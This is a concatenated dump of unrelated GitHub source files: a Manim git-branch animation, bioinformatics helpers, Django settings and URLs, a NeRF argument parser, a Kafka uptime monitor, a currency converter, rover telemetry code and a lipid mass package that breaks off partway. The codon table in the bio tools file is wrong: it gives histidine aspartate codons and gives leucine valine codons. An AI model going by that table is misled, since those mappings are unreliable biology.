self.remove(head_to_master_arrow)\n\n cmd = self.show_command(\"git checkout feature\", after=cmd)\n\n # move the head ref to point to the new feature ref\n self.play(head_ref.animate.next_to(feature_ref, DOWN))\n\n head_to_feature_arrow = self.create_arrow_between_refs(\n head_ref, feature_ref, UP)\n self.play(FadeIn(head_to_feature_arrow))\n\n g = Group(feature_ref, feature_to_commit_arrow,\n head_ref, head_to_feature_arrow)\n\n # create new commits on the feature branch\n for idx in range(self.NO_COMMITS_ON_FEATURE):\n # create commit\n commits_on_feature.append(self.create_commit(f'F{idx}'))\n\n # position the commit\n next_to = commits_on_master[-1] if idx == 0 else commits_on_feature[idx - 1]\n commits_on_feature[idx].next_to(\n next_to, DOWN if idx == 0 else RIGHT)\n if idx == 0:\n commits_on_feature[idx].shift(RIGHT * 0.5)\n\n # remove the feature ref and arrow between it and the commit\n if idx == 0:\n self.play(FadeOut(g))\n\n cmd = self.show_command(f'git commit -m \\'F{idx}\\'', after=cmd)\n\n # show the commit\n self.play(FadeIn(commits_on_feature[idx]))\n\n # show the arrow between the commits\n previous_commit = commits_on_master[-1] if idx == 0 else commits_on_feature[idx - 1]\n is_linear = False if idx == 0 else True\n arrow_between_commits = self.create_arrow_between_commits(\n commits_on_feature[idx], previous_commit, linear=is_linear)\n self.play(FadeIn(arrow_between_commits))\n\n # remove the arrow between the feature ref and commit\n self.remove(feature_to_commit_arrow)\n\n # move the feature ref\n self.play(feature_ref.animate.next_to(\n commits_on_feature[idx], DOWN))\n # show the arrow between the feature ref and commit\n feature_to_commit_arrow = self.create_arrow_between_ref_and_commit(\n feature_ref, commits_on_feature[idx], DOWN)\n self.play(FadeIn(feature_to_commit_arrow))\n\n self.remove(head_to_feature_arrow)\n self.play(head_ref.animate.next_to(feature_ref, DOWN))\n head_to_feature_arrow = self.create_arrow_between_refs(\n head_ref, feature_ref, UP)\n self.play(FadeIn(head_to_feature_arrow))\n\n self.wait(2)\n\n def intro(self):\n my_site = Text(\"vladflore.tech\", font=\"Noto Sans\").scale(0.75)\n self.play(Write(my_site))\n self.play(my_site.animate.shift(1.5 * UP))\n t = Text(\"Git Animated\", font=\"Noto Sans\",\n gradient=(RED, BLUE, GREEN)).scale(1.5)\n st = Text(\"From your first commit to your first branch\", font=\"Noto Sans\",\n color=BLUE).scale(0.5)\n g = Group(t, st).arrange(DOWN, buff=.8).next_to(my_site, DOWN, buff=0.8)\n self.play(FadeIn(g), run_time=2)\n self.play(FadeOut(g), run_time=2)\n self.play(my_site.animate.shift(1.5 * DOWN))\n self.play(Unwrite(my_site))\n\n def create_commit(self, id):\n circle = Circle(0.3).set_fill(\n color=self.COMMIT_FILL_COLOR, opacity=0.5).set_stroke(color=self.COMMIT_STROKE_COLOR, width=1)\n text = MarkupText(id, color=self.COMMIT_LABEL_COLOR).scale(0.2)\n circle.add(text)\n return circle\n\n def create_arrow_between_commits(self, start, end, linear=True):\n if linear:\n return self.create_arrow(start.point_at_angle(\n PI), end.point_at_angle(0), self.ARROW_COLOR)\n else:\n return self.create_arrow(start.point_at_angle(\n PI / 2), end.point_at_angle(0), self.ARROW_COLOR)\n\n def create_arrow_between_ref_and_commit(self, rectangle, circle, side):\n if np.array_equal(UP, side):\n start_arrow = rectangle.get_bottom()\n end_arrow = circle.point_at_angle(PI / 2)\n elif np.array_equal(DOWN, side):\n start_arrow = rectangle.get_top()\n end_arrow = circle.point_at_angle(3 * PI / 2)\n arrow = 
Arrow(start=start_arrow, end=end_arrow).set_color(\n self.ARROW_COLOR)\n return arrow\n\n def create_arrow_between_refs(self, start, end, side):\n if np.array_equal(UP, side):\n start_arrow = start.get_bottom()\n end_arrow = end.get_top()\n elif np.array_equal(DOWN, side):\n start_arrow = start.get_top()\n end_arrow = end.get_bottom()\n arrow = Arrow(start=start_arrow, end=end_arrow).set_color(\n self.ARROW_COLOR)\n return arrow\n\n def create_head_ref(self):\n rectangle = Rectangle(color=self.HEAD_REF_COLOR,\n width=0.5, height=0.25)\n text = MarkupText('HEAD', color=self.HEAD_REF_COLOR).scale(0.2)\n rectangle.add(text)\n return rectangle\n\n def create_branch_ref(self, name):\n rectangle = Rectangle(color=self.BRANCH_REF_COLOR,\n width=0.6, height=0.25)\n text = MarkupText(name, color=self.BRANCH_REF_COLOR).scale(0.2)\n rectangle.add(text)\n return rectangle\n\n @staticmethod\n def create_arrow(start, end, color):\n return Line(start=start, end=end, color=color).set_stroke(width=1.0).add_tip(tip_length=0.06)\n\n @staticmethod\n def create_command(text, after, corner=LEFT + UP, edge=LEFT):\n if after is None:\n return Text(text).scale(0.3).set_color(ORANGE).to_corner(corner).to_edge(edge)\n else:\n return Text(text).scale(0.3).set_color(ORANGE).next_to(after, DOWN).to_edge(edge)\n\n def show_command(self, command_text, after, speed=0.5):\n command = self.create_command(command_text, after)\n self.play(Write(command), run_time=speed)\n return command\n\n","repo_name":"vladflore/git-animated","sub_path":"linear-commits.py","file_name":"linear-commits.py","file_ext":"py","file_size_in_byte":9608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5215333107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 10:35:47 2019\n\n@author: Administrator\n\"\"\"\n\nfrom Bio import SeqIO\nimport numpy as np\n\ndef uniprotSeqs():\n uniprot_seqs_dict = {}\n for seq_record in SeqIO.parse('uniprot_sprot.fasta', 'fasta'):\n uniprot_seqs_dict[seq_record.id] = str(seq_record.seq)\n return uniprot_seqs_dict\n\n\nimport random\ndef aa2code(aa:str):\n code={}\n code['A'] = ['GCU','GCC','GCA','GCG']\n code['C'] = ['UGU','UGC']\n code['D'] = ['GAU','GAC']\n code['E'] = ['GAA','GAG']\n code['F'] = ['UUU','UUC']\n code['H'] = ['GAU','GAC']\n code['I'] = ['AUU','AUC','AUA']\n code['G'] = ['GGU','GGC','GGA','GGG']\n code['K'] = ['AAA','AAG']\n code['L'] = ['UUA','UUG','GUU','GUC','GUA','GUG']\n code['M'] = ['AUG']\n code['N'] = ['AAU','AAC']\n code['Q'] = ['CAA','CAG']\n code['P'] = ['CCU','CCC','CCA','CCG']\n code['R'] = ['CGU','CGC','CGA','CGG','AGA','AGG']\n code['S'] = ['UCU','UCC','UCA','UCG']\n code['T'] = ['ACU','ACC','ACA','ACG']\n code['V'] = ['GUU','GUC','GUA','GUG']\n code['W'] = ['UGG']\n code['Y'] = ['UAU','UAC']\n code['#'] = ['XXX']\n\n c = code[aa]\n return random.choice(c)\n\ndef plot_history(history):\n import matplotlib.pyplot as plt\n #%matplotlib inline\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n \n epochs = range(1, len(acc) + 1)\n \n # \"bo\" is for \"blue dot\"\n plt.plot(epochs, loss, 'bo', label='Training loss')\n # b is for \"solid blue line\"\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n \n plt.show()\n \n plt.clf() # clear figure \n plt.plot(epochs, acc, 'bo', label='Training acc')\n 
plt.plot(epochs, val_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n \n plt.show()\n \ndef displayMetrics(y_true, y_score, threshold=0.5):\n from sklearn import metrics\n y_pred = (y_score > threshold).astype(float)\n cm = metrics.confusion_matrix(y_true, y_pred)\n print(\"confusion_matrix:\\n\", cm)\n acc = metrics.accuracy_score(y_true, y_pred)\n print(\"accuracy:\", acc)\n mcc = metrics.matthews_corrcoef(y_true, y_pred)\n print(\"MCC:\", mcc)\n auc = metrics.roc_auc_score(y_true, y_score)\n print(\"AUC:\", auc)\n\ndef displayMLMetrics(y_true, y_pred, fileName, info):\n # output Multi-lable classifier's Metrics\n from sklearn import metrics\n with open(fileName, 'a') as fw:\n fw.write(info)\n fw.write(\"hamming loss = {}\\n\".format(metrics.hamming_loss(y_true, y_pred)))\n fw.write(\"subset accuracy = {}\\n\".format( metrics.accuracy_score(y_true, y_pred)))\n fw.write(\"macro average precision_score: {}\\n\".format(metrics.average_precision_score(y_true,y_pred,average=\"macro\")))\n fw.write(\"micro average precisioin_score: {}\\n\".format(metrics.average_precision_score(y_true,y_pred,average=\"micro\")))\n \ndef plot_cm(labels, predictions, p=0.5):\n from sklearn.metrics import confusion_matrix\n #import matplotlib as mpl\n import matplotlib.pyplot as plt\n import seaborn as sns\n #mpl.rcParams['figure.figsize'] = (12, 10)\n #colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n cm = confusion_matrix(labels, predictions > p)\n plt.figure(figsize=(5,5))\n sns.heatmap(cm, annot=True, fmt=\"d\")\n plt.title('Confusion matrix @{:.2f}'.format(p))\n plt.ylabel('Actual label')\n plt.xlabel('Predicted label')\n \n print('Legitimate Transactions Detected (True Negatives): ', cm[0][0])\n print('Legitimate Transactions Incorrectly Detected (False Positives): ', cm[0][1])\n print('Fraudulent Transactions Missed (False Negatives): ', cm[1][0])\n print('Fraudulent Transactions Detected (True Positives): ', cm[1][1])\n print('Total Fraudulent Transactions: ', np.sum(cm[1])) \n \n \n \n ","repo_name":"javafalcon/jci","sub_path":"bio/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17698614357","text":"\"\"\"Development settings.\"\"\"\n\nimport os\n\nfrom settings import * # noqa: F401, F403\n\nSECRET_KEY = 'development-only'\nDEBUG = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), # noqa: F405\n }\n}\n","repo_name":"CSESoc-CompClub/compclub-web","sub_path":"settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38090245435","text":"import sys\nimport os\n\n\nimport argparse\nfrom pyhocon import ConfigFactory\n\n\ndef parse_args(\n callback=None,\n training=False,\n default_conf=\"conf/default_mv.conf\",\n default_expname=\"example\",\n default_data_format=\"dvr\",\n default_num_epochs=10000000,\n default_lr=1e-4,\n default_gamma=1.00,\n default_datadir=\"data\",\n default_ray_batch_size=50000,\n):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--conf\", \"-c\", type=str, default=None)\n parser.add_argument(\"--resume\", \"-r\", action=\"store_true\", help=\"continue training\")\n parser.add_argument(\n \"--gpu_id\", type=str, 
default=\"0\", help=\"GPU(s) to use, space delimited\"\n )\n parser.add_argument(\n \"--name\", \"-n\", type=str, default=default_expname, help=\"experiment name\"\n )\n parser.add_argument(\n \"--dataset_format\",\n \"-F\",\n type=str,\n default=None,\n help=\"Dataset format, multi_obj | dvr | dvr_gen | dvr_dtu | srn\",\n )\n parser.add_argument(\n \"--exp_group_name\",\n \"-G\",\n type=str,\n default=None,\n help=\"if we want to group some experiments together\",\n )\n parser.add_argument(\n \"--logs_path\", type=str, default=\"logs\", help=\"logs output directory\",\n )\n parser.add_argument(\n \"--checkpoints_path\",\n type=str,\n default=\"checkpoints\",\n help=\"checkpoints output directory\",\n )\n parser.add_argument(\n \"--visual_path\",\n type=str,\n default=\"visuals\",\n help=\"visualization output directory\",\n )\n parser.add_argument(\n \"--epochs\",\n type=int,\n default=default_num_epochs,\n help=\"number of epochs to train for\",\n )\n parser.add_argument(\"--lr\", type=float, default=default_lr, help=\"learning rate\")\n parser.add_argument(\n \"--gamma\", type=float, default=default_gamma, help=\"learning rate decay factor\"\n )\n parser.add_argument(\n \"--datadir\", \"-D\", type=str, default=None, help=\"Dataset directory\"\n )\n parser.add_argument(\n \"--ray_batch_size\", \"-R\", type=int, default=default_ray_batch_size, help=\"Ray batch size\"\n )\n if callback is not None:\n parser = callback(parser)\n args = parser.parse_args()\n\n if args.exp_group_name is not None:\n args.logs_path = os.path.join(args.logs_path, args.exp_group_name)\n args.checkpoints_path = os.path.join(args.checkpoints_path, args.exp_group_name)\n args.visual_path = os.path.join(args.visual_path, args.exp_group_name)\n\n os.makedirs(os.path.join(args.checkpoints_path, args.name), exist_ok=True)\n os.makedirs(os.path.join(args.visual_path, args.name), exist_ok=True)\n\n PROJECT_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n EXPCONF_PATH = os.path.join(PROJECT_ROOT, \"expconf.conf\")\n expconf = ConfigFactory.parse_file(EXPCONF_PATH)\n\n if args.conf is None:\n args.conf = expconf.get_string(\"config.\" + args.name, default_conf)\n\n if args.conf is None:\n args.conf = expconf.get_string(\"config.\" + args.name, default_conf)\n if args.datadir is None:\n args.datadir = expconf.get_string(\"datadir.\" + args.name, default_datadir)\n\n conf = ConfigFactory.parse_file(args.conf)\n\n if args.dataset_format is None:\n args.dataset_format = conf.get_string(\"data.format\", default_data_format)\n\n args.gpu_id = list(map(int, args.gpu_id.split()))\n\n print(\"EXPERIMENT NAME:\", args.name)\n if training:\n print(\"CONTINUE?\", \"yes\" if args.resume else \"no\")\n print(\"* Config file:\", args.conf)\n print(\"* Dataset format:\", args.dataset_format)\n print(\"* Dataset location:\", args.datadir)\n return args, conf\n","repo_name":"sxyu/pixel-nerf","sub_path":"src/util/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":1273,"dataset":"github-code","pt":"54"} +{"seq_id":"25712256105","text":"from kafka import KafkaConsumer\n\nfrom src.utils.email_notification import send_email\n\n\nclass Availability:\n def __init__(self):\n self.monitor_availability()\n\n def check_statuscode(self, entry):\n parsed = entry.value.decode(\"utf-8\").split(\",\")\n if (\n parsed[2].find(\n \"recommendation request fall2022-comp585-5.cs.mcgill.ca:8082\"\n )\n != -1\n ):\n if parsed[3].find(\"status 200\") 
== -1:\n send_email(\n \"[COMP585] Recommendation failed status not 200\",\n entry.value.decode(\"utf-8\"),\n )\n print(entry.value.decode(\"utf-8\"))\n return\n\n def monitor_availability(self):\n server, topic = \"fall2022-comp585.cs.mcgill.ca:9092\", \"movielog5\"\n consumer = KafkaConsumer(\n topic, bootstrap_servers=[server], api_version=(0, 11, 5)\n )\n print(\"start monitoring availability\")\n for message in consumer:\n self.check_statuscode(message)\n\n\nif __name__ == \"__main__\":\n Availability()\n","repo_name":"mayshri/Team-5","sub_path":"src/monitor/availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24733053060","text":"# Try it yourself, page 115\n\ncities = {\n 'new york' : {\n 'country' : 'united states',\n 'population' : '8.623 million',\n 'fact' : 'it is the largest metropolitan area in the world by urban landmass',\n },\n 'shanghai' : {\n 'country' : 'china',\n 'population' : '24.1 million',\n 'fact' : 'its population makes it the most populous city not only in Asia but in the entire world',\n },\n 'moscow' : {\n 'country' : 'russia',\n 'population' : '13.1 million',\n 'fact' : 'has been ranked as the ninth most expensive city in the world',\n },\n }\n\nfor name, info in cities.items():\n print(\"\\n\" + name.title() + \":\")\n country = info['country'].title()\n population = info['population']\n fact = info['fact'].capitalize()\n\n print(\"\\t\" + country)\n print(\"\\t\" + population)\n print(\"\\t\" + fact)\n\n\n","repo_name":"bwest619/Python-Crash-Course","sub_path":"Ch 6 - Dictionaries/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33418218403","text":"import requests\nimport json\nimport click\nfrom pyfiglet import Figlet\nfrom clint.textui import colored, puts, indent\n\nf = Figlet(font='slant')\n\n\n@click.command()\n@click.argument('num', type=float)\n@click.argument('base')\n@click.argument('symbols', default='')\ndef main(num, base, symbols):\n print(f.renderText(\"PyConverter\"))\n\n num = num\n base = base.upper()\n symbols = symbols.upper()\n\n exchange_data = load_exchange_data(base)\n\n try:\n display(calc_rate(num, exchange_data, base, symbols), num, base)\n\n except Exception:\n print(\"That's not the easter egg you're looking for...\")\n\n\ndef display(data, num, base):\n puts(f\"{num} {base} = \")\n with indent(6, quote=\" >\"):\n for k, v in data.items():\n puts(f\"{k}: {v}\")\n\n\n# calculate exchange\ndef calc_rate(num, exchange_data, base, symbols):\n rates = dict()\n\n # TOTALNIE NIE EASTER EGG\n if base != \"PLN\" and symbols == 'SASIN':\n raise Exception(\"NOT POSSIBLE\")\n\n elif symbols == 'SASIN':\n n = num / 70000000\n rates[symbols] = \"{:.20f}\".format(n)\n\n elif symbols == '':\n\n for key, value in exchange_data['rates'].items():\n rates[key] = value * num\n\n else:\n rates[symbols] = exchange_data['rates'][symbols] * num\n\n return rates\n\n\n# wczytanie / pobieranie danych\ndef load_exchange_data(base):\n try:\n with open(f\"exchangedata_{base}.json\", \"r\") as e_data:\n data = json.load(e_data)\n puts(colored.cyan(f\"USING CACHED DATA ({data['date']})\"))\n return data\n except IOError:\n return get_and_dump_rates(base)\n\n\n# pobieranie i zapisanie danych\ndef get_and_dump_rates(base):\n puts(colored.cyan(\"REQUESTING FOR \" + base))\n r = 
requests.get(\n f\"https://api.exchangeratesapi.io/latest?base={ base }\")\n\n with open(f\"exchangedata_{base}.json\", \"w\") as outfile:\n json.dump(r.json(), outfile)\n return r.json()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TheLukaszNs/PyConverter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2834093868","text":"#\n# Mars Rover Design Team\n# telemetry_handler.py\n#\n# Created on Oct 27, 2020\n# Updated on Aug 21, 2022\n#\n\nimport core\nfrom core.rovecomm_module.rovecomm import RoveCommPacket\nimport logging\n\n\ndef telemetry_handler(event, value, log_msg):\n \"\"\"\n Sends some numerical data over the socket\n\n :param event:\n :param value:\n :param log_msg:\n :return: success (int): An integer, either 0 or 1 depending on whether\n an exception occurred during writing\n \"\"\"\n\n logger = logging.getLogger(__name__)\n\n # Matches log 'event' to event from predefined dict\n if event in core.rovecomm_event_list:\n event_data = core.rovecomm_event_list[event]\n data_id = event_data[\"data_id\"]\n data_type = event_data[\"data_type\"]\n # If the event uses preset values, match the correct one\n if \"values\" in event_data:\n if value in event_data[\"values\"]:\n data_value = tuple(event_data[\"values\"][value])\n else:\n logger.warning(f\"{value} is not a valid value for {event}\")\n data_value = ()\n # Otherwise take the value literally\n else:\n data_value = value\n\n # Pack up and send the data\n packet = RoveCommPacket(data_id, data_type, data_value, \"\", 0)\n logger.info(f\"{event}: {value} - {log_msg}\")\n return core.rovecomm_node.write(packet, True)\n else:\n logger.warning(f\"{event} is not a valid event\")\n","repo_name":"MissouriMRDT/Autonomy_Software_Python","sub_path":"core/telemetry_handler.py","file_name":"telemetry_handler.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"17327297453","text":"from django.urls import path\nfrom . import views\nfrom .views import IndexView, MenuItemListView, MenuItemDetailView, MenuItemCreateView, MenuItemUpdateView, MenuItemDeleteView\n\nurlpatterns = [\n path('', IndexView.as_view(), name='index'),\n path('menu', MenuItemListView.as_view(), name='menu_item_list'),\n path('/', MenuItemDetailView.as_view(), name='menu_item_detail'),\n path('create/', MenuItemCreateView.as_view(), name='menu_item_create'),\n path('update//', MenuItemUpdateView.as_view(), name='menu_item_update'),\n path('delete//', MenuItemDeleteView.as_view(), name='menu_item_delete'),\n]","repo_name":"Nikosanton82/GReat","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71794915042","text":"def codifica(f, c):\n# Funcion que codifica la fila f y columna c\n #Nf = 9#Numero total de filas\n #Nc = 9#Numero total de columnas\n if ((f < 1) or (f > Nf)):\n print(\"Fila incorrecta! Debe ser un numero entre 1 y\", Nf)\n return None\n elif ((c < 1) or (c > Nc)):\n print(\"Columna incorrecta! 
Debe ser un numero entre 1 y\", Nc)\n return None\n else:\n n = Nc * (f - 1) + c\n return chr(255 + n)\n\n\ndef decodifica(x, Nf, Nc):\n# Funcion que codifica un caracter en su respectiva\n# fila f y columna c de la tabla\n n = ord(x) - 255\n if ((n < 1) or (n > Nf * Nc)):\n print(\"Caracter incorrecto! Debe estar entre 1 y\", Nf * Nc)\n return None\n else:\n n = n - 1\n f = int(n / Nc) + 1\n c = n % Nc + 1\n return f, c\n\n\n# Codificacion y decodificacion de una tabla\n# de Nf filas y Nc columnas\nNf = 9 # Numero de filas\nNc = 9 # Numero de columnas\nletrasProposicionales = [chr(i) for i in range(256, 256 + Nf*Nc)]\nprint(\"letrasProposicionales\")\nfor i in range(Nc):\n print(letrasProposicionales[Nf*(i):Nf*(i+1)])\n\n# Intente con varias opciones para fila y columna\nfila = 9\ncolumna = 5\nprint(\"La fila es\", fila)\nprint(\"La columna es\", columna)\nn = codifica(fila, columna)\nprint(\"La codificacion es\", n)\nf, c = decodifica(n, Nf, Nc)\nprint(\"La decodificacion es fila\", f, \"columna\", c)\n","repo_name":"EstefaniaLaverde/Torres_de_Hanoi","sub_path":"PROYECTO_LOGICA/Ejercicios de clase/codific_caballos.py","file_name":"codific_caballos.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73745718241","text":"# -*- coding: utf-8 -*-\n# %%\nimport pandas as pd\nimport numpy as np\nimport tkinter as tk\nclass package:\n def __init__(self):\n # elements defined\n C = 12\n H = 1.007825\n N = 14.003074\n O = 15.994915\n P = 30.973763\n S = 31.972072\n Na = 22.98977\n Cl = 34.968853\n self.elements = [C,H,N,O,P,S,Na,Cl]\n self.elementsymbol = ['C','H','N','O','P','S','Na','Cl']\n ionname = ['M','M+H','M+2H','M+H-H2O','M+2H-H2O','M+Na','M+2Na','M+2Na-H','M+NH4',\n 'M-H','M-2H','M-3H','M-4H','M-5H','M-H-H2O','M-2H-H2O','M-CH3','M+Cl','M+HCOO','M+OAc']\n ionfunc = []\n ionfunc.append(lambda ms: ms)\n ionfunc.append(lambda ms: ms+package().elements[1])\n ionfunc.append(lambda ms: (ms+2*package().elements[1])/2)\n ionfunc.append(lambda ms: ms-package().elements[1]-package().elements[3])\n ionfunc.append(lambda ms: (ms-package().elements[3])/2)\n ionfunc.append(lambda ms: ms+package().elements[6])\n ionfunc.append(lambda ms: (ms+2*package().elements[6])/2)\n ionfunc.append(lambda ms: ms-package().elements[1]+2*package().elements[6])\n ionfunc.append(lambda ms: ms+4*package().elements[1]+package().elements[2])\n ionfunc.append(lambda ms: ms-package().elements[1])\n ionfunc.append(lambda ms: (ms-2*package().elements[1])/2)\n ionfunc.append(lambda ms: (ms-3*package().elements[1])/3)\n ionfunc.append(lambda ms: (ms-4*package().elements[1])/4)\n ionfunc.append(lambda ms: (ms-5*package().elements[1])/5)\n ionfunc.append(lambda ms: ms-3*package().elements[1]-package().elements[3])\n ionfunc.append(lambda ms: (ms-4*package().elements[1]-package().elements[3])/2)\n ionfunc.append(lambda ms: ms-package().elements[0]-3*package().elements[1])\n ionfunc.append(lambda ms: ms+package().elements[7])\n ionfunc.append(lambda ms: ms+package().elements[0]+package().elements[1]+2*package().elements[3])\n ionfunc.append(lambda ms: ms+2*package().elements[0]+3*package().elements[1]+2*package().elements[3])\n self.ion = {}\n for i,j in enumerate(ionname):\n self.ion[j] = ionfunc[i]\n# %% [markdown]\n# Package for Sphingolipids \n\n# %%\n\nclass package_sl(package):\n def __init__(self):\n # base structure defined \n self.base = {'Cer': np.array([0,3,1,0]+[0]*(len(package().elements)-4)),\n 'Sphingosine': 
np.array([0,3,1,0]+[0]*(len(package().elements)-4)),\n 'Sphinganine': np.array([0,3,1,0]+[0]*(len(package().elements)-4))}\n # headgroups defined\n headgroup = ['Pi','Choline','Ethanolamine','Inositol','Glc','Gal','GalNAc','NeuAc','Fuc','NeuGc']\n formula = []\n formula.append(np.array([0,3,0,4,1]+[0]*(len(package().elements)-5)))\n formula.append(np.array([5,13,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([2,7,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([8,15,1,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([11,19,1,9]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,5]+[0]*(len(package().elements)-4)))\n formula.append(np.array([11,19,1,10]+[0]*(len(package().elements)-4)))\n self.components = self.base.copy()\n for i,j in enumerate(headgroup):\n self.components[j] = formula[i]\n # sn type defined\n sntype = ['none','d','t']\n snformula = []\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon-2*db,0,2]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon+2-2*db,0,3]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon+2-2*db,0,4]+[0]*(len(package().elements)-4)))\n self.sn = {}\n for i,j in enumerate(sntype):\n self.sn[j] = snformula[i]\n # extended structure\n nana = ['M','D','T','Q','P']\n iso = ['1a','1b','1c']\n namedf = pd.DataFrame({'0-series': ['LacCer'],'a-series': ['GM3'],'b-series': ['GD3'],'c-series': ['GT3']})\n namedf = namedf.append(pd.Series(['G'+'A'+'2' for name in namedf.iloc[0,0:1]]+['G'+i+'2' for i in nana[0:3]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'A'+'1' for name in namedf.iloc[0,0:1]]+['G'+i+j for i,j in zip(nana[0:3],iso)],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'M'+'1b' for name in namedf.iloc[0,0:1]]+['G'+i+j for i,j in zip(nana[1:4],iso)],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'D'+'1c' for name in namedf.iloc[0,0:1]]+['G'+i+j for i,j in zip(nana[2:],iso)],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'D'+'1α' for name in namedf.iloc[0,0:1]]+[i+'α' for i in namedf.iloc[4,1:]],index = namedf.columns), ignore_index=True)\n sequencedf = pd.DataFrame({'0-series': ['Gal-Glc-Cer'],'a-series': ['(NeuAc)-Gal-Glc-Cer'],'b-series': ['(NeuAc-NeuAc)-Gal-Glc-Cer'],'c-series': ['(NeuAc-NeuAc-NeuAc)-Gal-Glc-Cer']})\n sequencedf = sequencedf.append(pd.Series(['GalNAc-'+formula for formula in sequencedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Gal-'+formula for formula in sequencedf.iloc[1,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['NeuAc-'+formula for formula in sequencedf.iloc[2,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['NeuAc-'+formula for formula in sequencedf.iloc[3,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['NeuAc-Gal-(NeuAc)-GalNAc-'+formula for formula in sequencedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n self.base = {'Cer': 'Cer','Sphingosine': 'Sphingosine','Sphinganine': 
'Sphinganine','Sphingosine-1-Phosphate': 'Pi-Sphingosine','Sphinganine-1-Phosphate': 'Pi-Sphinganine',\n 'CerP': 'Pi-Cer','SM': 'Choline-Pi-Cer','CerPEtn': 'Ethanolamine-Pi-Cer','CerPIns': 'Inositol-Pi-Cer',\n 'LysoSM(dH)': 'Choline-Pi-Sphinganine','LysoSM': 'Choline-Pi-Sphingosine',\n 'GlcCer': 'Glc-Cer','GalCer': 'Gal-Cer'}\n for i in namedf:\n for j,k in enumerate(namedf[i]):\n self.base[k] = sequencedf[i][j]\n def basesn(self,base,typ):\n typ = base[typ].split('-')[-1]\n if 'Cer' == base[typ]:\n return [['d','t'],list(range(18,23)),':',[0,1],'/',['none','h'],list(range(12,33)),':',[0,1]]\n elif 'Sphingosine' == base[typ]:\n return [['d','t'],list(range(18,23)),':','1']\n elif 'Sphinganine' == base[typ]:\n return [['d','t'],list(range(18,23)),':','0']\n else:\n return 0\n def iterate(self,base,typ,start,end):\n typ = base[typ].split('-')[-1]\n start = pd.Series(start)\n end = pd.Series(end)\n start = start.replace('none','')\n end = end.replace('none','')\n if 'Cer' == base[typ]:\n return ['{}{}:{}/{}{}:{}'.format(i,j,k,l,m,n) for i in [start[0]] for k in range(int(start[2]),int(end[2])+1) for j in range(int(start[1]),int(end[1])+1) for n in range(int(start[5]),int(end[5])+1) for l in [start[3]] for m in range(int(start[4]),int(end[4])+1)]\n elif 'Sphingosine' == base[typ]:\n return ['{}{}:1'.format(i,j) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1)]\n elif 'Sphinganine' == base[typ]:\n return ['{}{}:0'.format(i,j) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1)]\n else:\n return 0\n# %% [markdown]\n# Package for Glycerophospholipids\n\n# %%\nclass package_gpl(package):\n def __init__(self):\n # base structure defined \n self.base = {'PA': np.array([3,9,0,6,1]+[0]*(len(package().elements)-5)),\n 'LysoPA': np.array([3,9,0,6,1]+[0]*(len(package().elements)-5))}\n # headgroups 